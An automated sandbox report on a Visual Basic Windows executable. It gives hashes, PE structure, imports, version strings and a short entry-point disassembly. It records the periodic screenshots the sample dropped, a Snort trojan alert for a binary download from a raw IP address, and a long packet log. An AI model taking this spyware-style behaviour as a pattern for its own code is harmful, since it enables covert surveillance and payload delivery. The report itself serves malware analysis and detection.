SSDEEP:	12288:nAG53EhiIc4ezePK+t5Xi9ZLTtTNSuSyIqFOCylKpm2ajfWTB8du3/:3qkIctSJnkpT4iFO7l0Fd
MD5:	C919959C585542D1FECA86D4FF05456E
SHA1:	BCE69D21F6CEEEA1A67E4A3140C7E3F648423E00
SHA-256:	8B5FEC93876C5A2C7CF26E52BEF0D225E79E42C57F81C0D668C07B8C4B46FB66
SHA-512:	AB4731DF323CC4CF620F6EA9499B8D700AFBECBE962A6C08B2BA5B157C4DFD818D94E3677CC01DD33A0CD1593FA31418F71B8547186A41F2389DACEB4D3B1DE5
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_045816.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805709
Entropy (8bit):	7.953835421134929
Encrypted:	false
SSDEEP:	12288:WhJ4iVkp4pkR6l/qf49+9vl6U/cQJcb7jFZA+QaK9eSbUIg9nCIBC5epXbKjj12F:WvJkOW6srl7ciSlZue7BREsmpY
MD5:	D1AA5C9473FE36D89ACC65401B3EE4B5
SHA1:	14B71284235DB7FF8D9B4AC518197EE54DAB5BEF
SHA-256:	A1771D0DA033DF5498722E31157AD0A15124FF9F5E5427457736ABAAB047C7CE
SHA-512:	DE3899888728A399ACCCA7149446083E216A254671B5698D45C8579832F39FACEACF16679B9BA870DAA818771942B8E8C6C7ABB3CE3E38738C23558864263548
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..Q..(......b`.D.....3..t.A.PD.D..A$...fT.y.O0gE..1.. J.@}.j.^..[{W....}...tw.\..S.{ff.'...T..fff.';f.z..i.../....^.Z[V,~f...u..X..Y...u....(].c..u.lG...<#0......v!.zj.5.b.\..m{........j...#E.1.2.&.r.P..4....Au.dv..z....kT...+fV..H\|....r..{......k<..N<.1....3.\|....(.jNh.....7Rd...J...m:.c!A-?...Ov...D...........>...+x.Xd..e.e?.7.F.D{z....6.ef.M......c....j..f.....yN..z...n...-..Y..m.......(@..'...%...1PKS..6@.Y....u+.s%a....&....qW....,..Ft.....P.#...Y..}....xs....GB...4...@....c.Va....g.6....b..l.j;O...n..2......i[P..(,.........O.a.{0&[.8.!5.h..#.... ..,...-~.3...R.eJ..r0.1....T.L......&.......T....6..m.1........`.S.p,@..R..{bh.P.>.....T..A._.S..7....,..Ft.....P.#...Y..}....-.'ce............l.&...v......,l+#..:.......=.."P..0.....P.@>.D..Q_.%.f..O...E.6w.4.."l.HP.l..hY...r.#t.p..A...` ).2*}..Lh@.H'?....V..?...9.a>.T..(.F...:.U..]

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_050816.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	796706
Entropy (8bit):	7.957036024835413
Encrypted:	false
SSDEEP:	24576:tVeBGQw+UQjjkuiX84b2Qt7VJYrExxykzC:HQdU6jkuiX84b2QXJYIEkm
MD5:	5DC583708DCF9270E71A6374C9A03EB9
SHA1:	CEB14081E201F986D4D79BEACFD1D9D506A3A06F
SHA-256:	BA0192407BD06570B90E5FD23F5DDED63F1C5CFB01820C6843486078CB2A75B9
SHA-512:	13A9C3AFEBF3A36F531BEE62AF40E86BCE43859792A90BB50994D49ABB25725DE6772CAB71E46B627AEBE6C9C6B966B57AA1E3C4D72935C68B1B2174C592D5FA
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...%E..}...\.$i...f.Q@E%GA.......(...9...a.C....P.....U.0...T.rRf....Vu..V...w.}....<.g.]..+.zOu....o7C.....fh.......B..{w.........6........+.L.....Y~.....<6.Y~.rD.a.{=C...a.m.b.wf.....el..X:.e.u./.\|.-%..C.Q.[.8....CQz..)....^.B=e..@.5..2.CKS]$i...ZU%..(..M..X..fd.b]....8..Z..P~.o2&4.O.G..)..w.J...mj.}!.L~...e7p...D...TA.3.7.J...+h..uc.]w....0.@......2<.......:6.Ff......:.=.g.-.6....&m.@v..5..\|.'...3_..W2.1..>...../{.O.....u.C..<...q]....J.......:p.....v..D.>m.9..L...I_.o.......it... hs{..[.......e...?yt...Pm.I.U..Y.VF~U.igk`.......@q{CG..:..0....d)5.:$#...`9"\|.@...........F..P..L..Tv.&:T.R.k..\|.....I.d........ ....1$...._+.....}..(....]....!.z.......u...M........C.....y.2..y?}"...~.a...e,.....?.~O.._%..i..9< ...5.+...v@mM..%..?d...e\|.C..'mT..7fa[..U.....i[P..(,.........cE...M ...I_.,FE.n..)..4.....b.B....j..'.-...+'?B_....S;R..+.2}..L.C.H'.....V..?...9.a>.

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_051818.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805744
Entropy (8bit):	7.9544298824383235
Encrypted:	false
SSDEEP:	24576:n4TW8TVQ8XgQoKqq+kDCKthsZFayV/UMqppeojdg:h8TFX4QBD/tmZ0pMOpjjdg
MD5:	2EA774300B5E25393BCE4D31ADB106B8
SHA1:	245E1C52737500E44A72720EED8FDDB28FAD3243
SHA-256:	014229C2139A2EDB4E546495FA398FAF337DBD84D62A3E71E555B2B9E857A549
SHA-512:	1D9DB0BDD5BA7B7619837ECFA152BC011E7C6DB26B54BDB6467BA5539F6790BD072268B0BA719F82262EC6FB7CC7233893CC862C42A6803B4981723725270CFA
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..QG%(............`..q....8(.....""..`..J0...&...b"(A....].z..o.].{w.>..y....s.zO..U.dfV}r.j.....]..72..D..zF.klQ..Y.3kz..bm.g7..sb..&..t)..c....~6.....g.Xd.X.iuV..ms..../VI......T.3....P?.t.X..!@a.......1..U3.).....Q.gW..Y..".e........vw..$3..D..Op.<z.1B.Q...h?...o..>...v.d.t..B.Z~........E!..A.3.[[%j}...W...K..~.o..b.....]dm.......bs3g...[:.=....{.M..fK..Av.?4.G..H...C.>...m..y.I..f.i.....=..K....f#.n..._.Xg.r.l;..@-M9>..}d...u!.kW..J.~.3..oMT.......EY..4.....<...G......}..5<b.f..'ce....X...i.... js.....?@..m.!.'.....v..Q%:..me.CG;[....'PX..;..........`L..q.Cj..T.lG....@.#X....[.Tgt......L.`.c@.!.........M. ........8..m:Q..cj.).).M......X.6..........}...ef.y...l]"..Yf...?.............V.Q.v.T.\.@._.S..7....l..Ft.....P.#...Y..}....-.'ce............l.&...v......,l+#..:.......=.."P..0.....P.@>.D..Q_.%.f..O...E.6w.4.."l.HP.l..h

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.878526280109068
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	g4FtSOZMD9.exe
File size:	258048
MD5:	81f377eda4163da1b74cae83e38ced9f
SHA1:	e50abaf01a9fd3ae8176b5b6117f6b8f8a355ec0
SHA256:	a16d035ca37dbd7ab34c856f4cdf96a9898dcebba08c5801c99f3d3100ae6b3f
SHA512:	8fd4613830195a00650386e450e72081546603de6fdff40ca039464cb5d33fd0d2aed0151c6f40558671d631c132f99a5400d9a2db304aac05729b941c40a63d
SSDEEP:	3072:ShYPey2QV00E3KxPpW9J+PZK7kzqHD2+KM5KOKVhYPey2QV00E:ShYGy2a00yiw0ZK7RjbnQhYGy2a00
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....6.Y..........................................@................

File Icon


Icon Hash:	00030313371f3800

Static PE Info

General
Entrypoint:	0x401604
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x599A3698 [Mon Aug 21 01:25:44 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	86e8943063c6c8ab68d4fd8da1862bd7

Entrypoint Preview

Instruction
push 0040F390h
call 00007F0A406DC843h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+0297E4EAh], dl
out dx, al
sub ecx, dword ptr [edi-58h]
inc byte ptr [375B32A1h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc ecx
outsb
popad
insd
outsb
imul esp, dword ptr [ecx+33h], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add dh, bh
std
adc esp, dword ptr [edx]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d994	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x31000	0xe1a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1f0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2d044	0x2e000	False	0.457790208899	data	5.78348802097	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x2f000	0x1250	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x31000	0xe1a0	0xf000	False	0.640185546875	data	6.27760526833	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3e7e1	0x9bf	PNG image data, 256 x 256, 4-bit colormap, non-interlaced
RT_ICON	0x3d45f	0x1382	PNG image data, 256 x 256, 8-bit colormap, non-interlaced
RT_ICON	0x3783e	0x5c21	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x37716	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x3742e	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 0
RT_ICON	0x36dc6	0x668	data
RT_ICON	0x3685e	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x35fb6	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
RT_ICON	0x3510e	0xea8	data
RT_ICON	0x34ca6	0x468	GLS_BINARY_LSB_FIRST
RT_ICON	0x33bfe	0x10a8	data
RT_ICON	0x31656	0x25a8	data
RT_GROUP_ICON	0x315a8	0xae	data
RT_VERSION	0x31300	0x2a8	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

__vbaVarSub, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, __vbaPut3, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaI2I4, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaVarLateMemCallLd, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Cfar
InternalName	Indregnet8
FileVersion	1.00
CompanyName	Cfar
LegalTrademarks	Cfar
ProductName	Cfar
ProductVersion	1.00
FileDescription	Cfar
OriginalFilename	Indregnet8.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/02/22-02:28:02.373487	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49835	80	192.168.2.6	147.189.137.168

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2022 02:28:02.274339914 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.372740030 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.372864962 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.373486996 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.499038935 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.499066114 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.499083042 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.499106884 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.499120951 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.499125004 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.499165058 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.499185085 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.597301960 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.597328901 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.597342968 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.597382069 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.597408056 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.599652052 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.599713087 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.599730968 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.599747896 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.599747896 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.599770069 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.599783897 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.599791050 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.599808931 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.599812031 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.599822998 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.599836111 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.599864960 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.695604086 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.695719957 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.695727110 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.695780993 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.695806980 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.695847034 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.695907116 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.695914030 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.695964098 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.696228981 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698076963 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698133945 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698183060 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698201895 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698206902 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698254108 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698259115 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698302984 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698304892 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698353052 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698358059 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698401928 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698402882 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698451996 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698455095 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698529005 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698542118 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698596954 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698612928 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698627949 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698662996 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698684931 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698735952 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698774099 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.698781967 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.698820114 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.794315100 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794414997 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794423103 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.794466972 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.794467926 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794511080 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.794517994 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794567108 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.794575930 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794616938 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.794626951 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794668913 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.794668913 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794718027 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794758081 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.794766903 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794805050 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.794807911 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.797458887 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797512054 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797539949 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.797563076 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797569990 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.797629118 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.797631025 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797676086 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.797682047 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797732115 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797734022 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.797780037 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.797782898 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797831059 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.797856092 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797904015 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.797930002 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797983885 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.797995090 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798036098 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798064947 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798094988 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798146009 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798147917 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798171043 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798209906 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798218012 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798268080 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798270941 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798320055 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798321962 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798371077 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798372030 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798423052 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798424959 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798468113 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798471928 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798521996 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798522949 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798571110 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798573017 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798623085 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798623085 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798676014 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798675060 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798726082 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.798727989 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798767090 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.798779011 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.893237114 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893282890 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893321037 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893357992 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893389940 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893418074 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.893433094 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893469095 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893487930 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.893507004 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893544912 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893579006 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.893580914 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893620014 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893649101 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.893656969 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893695116 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893709898 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.893733978 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893771887 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893789053 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.893810034 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893838882 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.893865108 CET	49835	80	192.168.2.6	147.189.137.168
Jan 2, 2022 02:28:02.897551060 CET	80	49835	147.189.137.168	192.168.2.6
Jan 2, 2022 02:28:02.897635937 CET	80	49835	147.189.137.168	192.168.2.6
